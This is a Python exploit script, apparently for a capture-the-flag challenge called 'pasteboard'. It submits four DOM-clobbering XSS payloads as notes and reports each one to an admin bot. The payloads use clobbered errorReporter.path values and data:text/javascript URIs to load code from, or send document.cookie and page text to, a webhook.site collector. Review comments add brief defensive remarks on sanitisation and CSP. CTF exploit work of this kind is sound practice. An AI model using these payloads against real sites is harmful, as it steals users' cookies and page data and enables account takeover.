import requests
import time

# Challenge instance under test; every request this script sends goes to this host.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
# Out-of-band collector URL that the note bodies below point at.
# NOTE(review): the collector UUID is committed in plaintext here and repeated inside
# methods 1 and 2; on webhook.site the UUID is, by default, all that protects the
# request log, so anything captured is readable by whoever has this file.
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# DOM clobbering test bodies. Each one defines elements whose id/name attributes make
# the browser expose them as window.errorReporter (and, through name="path", as
# errorReporter.path), then uses an <img onerror> handler to set
# window.lastRenderError and throw.
# NOTE(review): this presumes the page reads window.errorReporter.path after a render
# error and loads it as a script. That is taken from the original author's note, not
# from anything visible in this file; confirm against the challenge source.
# Defender's view: the bodies only matter if user-supplied id/name attributes and
# inline onerror handlers survive sanitisation and the page trusts a window global
# as a script location. Stripping named properties (e.g. DOMPurify's
# SANITIZE_NAMED_PROPS), type-checking the config object before use, and a CSP
# script-src allow-list each close that path independently.
# NOTE(review): all four literals carry an f prefix, but only methods 3 and 4
# interpolate WEBHOOK; methods 1 and 2 hard-code the collector host and UUID.
payloads = [
    # Method 1: <form id="errorReporter"> wrapping <input name="path"> whose value is a
    # protocol-relative URL on the collector. The <img> carries id="renderConfig" and
    # its onerror handler sets lastRenderError and throws.
    f'''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/flag.js?"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">''',
    
    # Method 2: two anchors sharing id="errorReporter"; the second adds name="path" and a
    # protocol-relative href on the collector. (The markup uses anchors, not an iframe.)
    # The onerror handler also removes the element with id "errorReporterScript"
    # before throwing.
    f'''<a id="errorReporter"></a>
<a id="errorReporter" name="path" href="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/cookies.js?c="></a>
<img src=x onerror="window.lastRenderError='triggered';document.getElementById('errorReporterScript').remove();throw Error()">''',
    
    # Method 3: nested anchors sharing id="errorReporter"; the inner one has name="path"
    # and a data:text/javascript href that sends base64-encoded document.cookie to
    # WEBHOOK.
    f'''<a id="errorReporter" href="#"><a id="errorReporter" name="path" href="data:text/javascript,fetch('{WEBHOOK}?flag='+btoa(document.cookie))"></a></a>
<img src=x onerror="window.lastRenderError='x';throw Error()">''',
    
    # Method 4: <form id="errorReporter"> with two inputs named "path"; the second one's
    # value is a data:text/javascript URI that sends base64-encoded
    # document.body.innerText to WEBHOOK.
    f'''<form id="errorReporter">
  <input name="path" id="path">
  <input name="path" value="data:text/javascript,fetch('{WEBHOOK}?d='+btoa(document.body.innerText))">
</form>
<img src=x onerror="window.lastRenderError='error';throw Error()">''',
]

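# Per-request ceiling in seconds. requests applies no timeout by default, so a
# stalled connection would otherwise block the whole run indefinitely.
HTTP_TIMEOUT_S = 15

# For each candidate body: create a note, then submit that note's path to /report.
for i, payload in enumerate(payloads, 1):
    print(f"\n[*] Trying DOM clobbering payload {i}/{len(payloads)}...")
    print(f"[*] Payload preview: {payload[:100]}...")

    # A new Session per body means no cookies carry over between attempts; the
    # context manager releases its pooled connections when the attempt ends.
    with requests.Session() as session:
        try:
            # allow_redirects=False so the 302 and its Location header are
            # inspected here instead of being followed automatically.
            response = session.post(
                f"{BASE_URL}/note/new",
                data={"title": f"DOM Clobber {i}", "body": payload},
                allow_redirects=False,
                timeout=HTTP_TIMEOUT_S,
            )
            location = response.headers.get("Location")

            if response.status_code != 302:
                print(f"[-] Failed to create paste: {response.status_code}")
            elif not location:
                # Without this guard a missing header would be formatted into
                # the URL as the literal text "None" and then reported.
                print("[-] Failed to create paste: 302 response had no Location header")
            else:
                note_url = f"{BASE_URL}{location}"
                print(f"[+] Paste created: {note_url}")

                # The report endpoint receives the path from Location, not the
                # absolute URL.
                report_response = session.post(
                    f"{BASE_URL}/report",
                    data={"url": location},
                    timeout=HTTP_TIMEOUT_S,
                )
                if report_response.status_code == 202:
                    print("[+] Reported to bot - waiting 35 seconds...")
                    # presumably long enough for the bot to open the note - TODO confirm
                    time.sleep(35)
                else:
                    print(f"[-] Failed to report: {report_response.status_code}")
        except requests.RequestException as exc:
            # Covers timeouts and connection errors; move on to the next body
            # rather than aborting the run with a traceback.
            print(f"[-] Request failed: {exc}")

    # Short pause between attempts, taken whether or not the attempt succeeded.
    time.sleep(2)

print("\n[*] All payloads sent. Check webhook now!")
# Derive the viewer link from WEBHOOK so the two cannot drift apart when the
# collector URL is changed.
webhook_id = WEBHOOK.rstrip("/").rsplit("/", 1)[-1]
print(f"[*] Webhook URL: https://webhook.site/#!/{webhook_id}")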
